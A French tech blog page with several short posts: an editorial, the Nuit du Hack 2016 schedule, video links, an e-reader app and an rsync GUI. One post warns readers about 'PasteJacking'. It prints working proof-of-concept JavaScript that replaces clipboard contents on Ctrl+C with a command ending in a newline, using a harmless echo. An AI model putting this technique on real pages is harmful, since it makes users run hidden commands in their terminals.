Entrez vos identifiants

x
OU
Vous avez oublié votre mot de passe ?
Utilisateur wiki : vous n'aviez pas d'email ?

Korben - Site d'actualité geek et tech

Go Top

Edito du 18/05/2016

Hello tout le monde,

je suis de retour du Var avec des tas d'idées, des trucs à raconter et des bons souvenirs plein la tête. Ce FPV AirShow était exceptionnel. Je me grouille de rédiger un truc qui déchire pour que vous sachiez tout sur cet événement et sur les drones de course.

Mais en attendant, retour à la réalité avec une boite mail en carafe qu'il faut que je répare (j'ai atteins mes 50 Go de stockage alors je vide petit à petit) et quelques milliers de news à dépiler dans Feedly.

Donc je cravache et tout devrait rentrer dans l'ordre rapidement ;-)

Passez une excellente fin de semaine.

K.

La Nuit du Hack 2016 c’est bientôt ! Pensez à réserver votre place !

0

ndh

Je ne sais pas ce que vous faites du 2 au 3 juillet, mais moi je serai du côté de Disneyland Paris pour assister à la Nuit du Hack 2016. Ça va démarrer le samedi à partir de 9h avec une journée-conférences et de Bug Bounty dont voici le détail :

10h00 : Keynote : À venir.

10h30 : Ouverture Bug Bounty

10h45 : (FR) Windows 10 - Security and Privacy par Paul Hernault

11h30 : (EN) Tails - Security, Maintainability and Usability, pick three! par Julien Vosin

12h15 : (FR) Microservices hacking & security par Clad

13h00 : Pause

13h45 : Bounty time

14h00 : (EN) A Dozen Years of Shellphish: From DEFCON to the DARPA Cyber Grand Challenge par Antonio Bianchi

14h45 : (FR) Review of the ZigBee security of a famous French set-top box par Renaud Lifchitz

15h30 : (EN) An In-Depth Dive into the Ethereum Protocol par Lefteris Karapetsas

17h00 : Bounty Time

17h15 : (FR) House intercoms attacks: when frontdoors become backdoors par Sébastien Dudek

18h00 : (EN) Improvised LockPicking tools par Till Lenze et Alexandre Triffault

18h45 : (FR) Turning a GPS-based dating application into a tracking system par Julien Szlamowicz et Julien Legras

19h30 : (EN) Developing x64dbg par Duncan Ogilvie

21h00 : Bounty Time

21h15 : (FR) Mass-pwning with a small IoT spy bug par Damien Cauquil

22h00 : (EN) Trust No One. ATMs and their dirty little secrets par Olga Kochetova

Évidemment, comme d'habitude ces 24h seront aussi l'occasion de participer à des challenges, d'assister à un CTF avec les meilleures équipes de hackers, sans oublier les ateliers qui vous permettront d'expérimenter de nouvelles choses (lockpicking, Arduino, vie privée, robotique, analyse de malware...etc.).

YesWeHack sera aussi présent pour mettre en relation les recruteurs et les experts en sécurité qui cherchent du boulot, et si vous emmenez vos enfants, sachez qu'ils ne s'ennuieront pas grâce à l'espace NDH Kids où ils apprendront à bidouiller des tas de trucs.

Lors de cette Nuit du Hack, vous pourrez aussi alerter d'éventuels problèmes de sécurité lors du confessionnal Zataz (Hâte de voir Damien Bancal en aube blanche). Quant à moi, je me baladerai là bas donc on aura le temps de papoter et faire des photos dans tous les sens.

Si tout ça vous plait, sachez que jusqu'au 1er juin, la place est à 50 €. Après cette date, ça passera à 66 €.

Pour vous inscrire c'est par ici.

Vous avez aimé cet article ? Alors partagez-le avec vos amis en cliquant sur les boutons ci-dessous :

Twitter Facebook Google Plus Linkedin email Flattr ! Bitcoin DogeCoin

Elise Lucet sans filtre

1

Elise Lucet sans filtre

Mes copains de Thinkerview ont pris le temps d'échanger avec Elise Lucet au sujet des Panama Papers, des lanceurs d'alerte, de la profession de journaliste, de la protection des sources et j'en passe.

Passionnant !

Vous avez aimé cet article ? Alors partagez-le avec vos amis en cliquant sur les boutons ci-dessous :

Twitter Facebook Google Plus Linkedin email Flattr ! Bitcoin DogeCoin

Réalité hyper augmentée

0

Réalité hyper augmentée

Quand nous aurons laissé la technologie prendre suffisamment le pas sur nos vie, voici peut être à quoi cela ressemblera pour nous...

Ce film a été réalisé par Keiichi Matsuda et tourné à Medellín en Colombie.

Merci à Tristan pour le partage.

+ d'infos ici.

Vous avez aimé cet article ? Alors partagez-le avec vos amis en cliquant sur les boutons ci-dessous :

Twitter Facebook Google Plus Linkedin email Flattr ! Bitcoin DogeCoin

Bibliovore – Lisez vos livres électroniques sous Windows 10 sans vous faire mal aux yeux

1

wallhaven-137197

Jusqu'à présent, le seul logiciel trop méga cool que je connaissais pour gérer ma bibliothèque de livres électroniques, c'était Calibre. Puis là, je viens de tomber par hasard sur Bibliovore, un outil de gestion de bibliothèque numérique pour Windows 8.x / 10 uniquement.

apps.6606.9007199266380520.27536de3-0268-4731-847d-3d6c3930d178

apps.54594.9007199266380520.f56e32e2-1255-41d3-b062-a619029d0a26

apps.6019.9007199266380520.7e59f38d-807a-42a2-8cdd-823f4f207404

Voici les fonctionnalités :

  • Supporte deux des formats de livre numérique les plus populaires : EPUB et PDF
  • Ajoutez vos livres un par un ou plusieurs simultanément dans votre bibliothèque, puis organisez les selon vos souhaits
  • Ouverture rapide des livres
  • Reprise de lecture
  • Accès direct par la table des matières
  • Ajout de marque-pages personnalisés
  • Réglage des paramètres de police de lecture pour un meilleur confort
  • Mode jour / nuit
  • Gestion des thèmes de lecture (Noir sur blanc, sépia, etc.)
  • Respect de la mise en page de l'éditeur du livre
  • Recherche au sein de la bibliothèque
  • Editez les métadonnées de vos livres pour mieux les organiser
  • Parcourez et téléchargez des livres directement au sein de Bibliovore depuis des bibliothèques en ligne (OPDS).
  • Lecture partagée sur plusieurs appareils (avancement et paramètres de lecture)
  • Mode portrait / Mode paysage
  • Mode une page / deux pages
  • Livres multivolumes pris en charge au sein des séries

Il est assez joli et si vous avez une tablette Surface, je pense que ça va vous être bien utile !

Bonne lecture à tous !

Vous avez aimé cet article ? Alors partagez-le avec vos amis en cliquant sur les boutons ci-dessous :

Twitter Facebook Google Plus Linkedin email Flattr ! Bitcoin DogeCoin

Attention au PasteJacking (et merci de ne pas copier coller cet article)

1

wallhaven-321038

La technique n'est pas nouvelle et j'ai déjà abordé le problème en 2015. En gros, il est possible avec un simple bout de javascript, de mettre autre chose dans le presse-papier de l'ordinateur en cas de copier coller.

Cela peut poser de nombreux soucis notamment sur les sites qui donnent des lignes de commande que les gens copient et collent machinalement. J'ai déjà mis en garde sur le sujet donc je ne reviendrai pas dessus (aller lire l'article linké ci-dessus). Par contre, pour ceux qui veulent comprendre comment ça fonctionne, sachez qu'un bout de code baptisé PasteJacking est disponible sur Github.

Voici le code en question :

<html>
<body>
Copy the text below and run it in your terminal for totally not evil things to happen.
</br>

<p>echo "not evil"</p>
<script>
function copyTextToClipboard(text) {
var textArea = document.createElement("textarea");

//
// *** This styling is an extra step which is likely not required. ***
//
// Why is it here? To ensure:
// 1. the element is able to have focus and selection.
// 2. if element was to flash render it has minimal visual impact.
// 3. less flakyness with selection and copying which **might** occur if
// the textarea element is not visible.
//
// The likelihood is the element won't even render, not even a flash,
// so some of these are just precautions. However in IE the element
// is visible whilst the popup box asking the user for permission for
// the web page to copy to the clipboard.
//

// Place in top-left corner of screen regardless of scroll position.
textArea.style.position = 'fixed';
textArea.style.top = 0;
textArea.style.left = 0;

// Ensure it has a small width and height. Setting to 1px / 1em
// doesn't work as this gives a negative w/h on some browsers.
textArea.style.width = '2em';
textArea.style.height = '2em';

// We don't need padding, reducing the size if it does flash render.
textArea.style.padding = 0;

// Clean up any borders.
textArea.style.border = 'none';
textArea.style.outline = 'none';
textArea.style.boxShadow = 'none';

// Avoid flash of white box if rendered for any reason.
textArea.style.background = 'transparent';
textArea.value = text;

document.body.appendChild(textArea);

textArea.select();

try {
var successful = document.execCommand('copy');
var msg = successful ? 'successful' : 'unsuccessful';
console.log('Copying text command was ' + msg);
} catch (err) {
console.log('Oops, unable to copy');
}

document.body.removeChild(textArea);
}

document.addEventListener('keydown', function(event) {
var ms = 800;
var start = new Date().getTime();
var end = start;
while(end < start + ms) {
end = new Date().getTime();
}
copyTextToClipboard('echo "evil"\n');
});

</script>
</body>

</html>

Pour que ça fonctionne, il faut que la victime fasse un CTRL+C (ou CMD + C sous OSX). Si elle fait un clic droit "copier", ça ne fonctionnera pas.

Vous avez aimé cet article ? Alors partagez-le avec vos amis en cliquant sur les boutons ci-dessous :

Twitter Facebook Google Plus Linkedin email Flattr ! Bitcoin DogeCoin

RSyncOSX – Une interface graphique OSX pour RSync

0

wallhaven-380683

Si vous êtes sous Mac et que vous voulez sauvegarder et synchroniser des données entre vos ordinateurs ou avec un serveur distant, une bonne solution est d'utiliser le logiciel libre Rsync.

Mais tout le monde n'est pas à l'aise en ligne de commande. C'est pourquoi Thomas Evensen a créé RsyncOSX qui est ni plus ni moins qu'une interface graphique (GUI) pour RSync.

Il permet donc de faire des sauvegardes incrémentales (ou non d'ailleurs) et des restaurations, soit localement (disque USB par exemple), soit vers des serveurs distants (votre NAS, un serveur web à l'autre bout du monde...etc.). Bref tout pareil qu'avec RSync mais en mode clickodrome.

estimating_Maxfilesize

execute2

À garder dans votre boite à outils.

Sinon, dans le même genre, j'utilise AASync qui fait grosso modo la même chose (via SFTP) sauf qu'il est payant.

Vous avez aimé cet article ? Alors partagez-le avec vos amis en cliquant sur les boutons ci-dessous :

Twitter Facebook Google Plus Linkedin email Flattr ! Bitcoin DogeCoin

  • Rejoignez les 57284 bidouilleurs de la grande famille des Korbenautes
    «Je considère que votre email est aussi important que le mien.»
    Korben
  • DANS TON CHAT (BASHFR)

    (Ar0z) wow, je viens de retrouver un pot de mayo ouvert dans un tiroir de mon bureau, fait au moins trois mois qu'il est là!
    (Ar0z) je le garde pour la science

    -- http://danstonchat.com/4225.html
  •  
  • RSS Emplois sécurité

  • Site hébergé par
    Agarik Sponsor Korben
  • RSS Offres d’emploi

  •  
  • C’est le moment de chiffrer

    votre téléphone Android

    J'ai remarqué autour de moi que peu de personnes pensaient à chiffrer leur téléphone ou leur tablette Android. Pourtant, ça me semble être la règle de base quand on désire protéger un minimum ses données. Si vous perdez votre téléphone, il est assez simple d'en récupérer les données...lire la suite

    Glowbl – Pour diffuser et engager

    une conversation autour

    d’un même contenu

    J'aime bien les outils collaboratifs en ligne. Je trouve ça toujours autant "magique" de voir que d'autres bossent en même temps que nous...lire la suite

    En ce moment dans l'univers "Raspberry Pi"

    Voir tous les articles »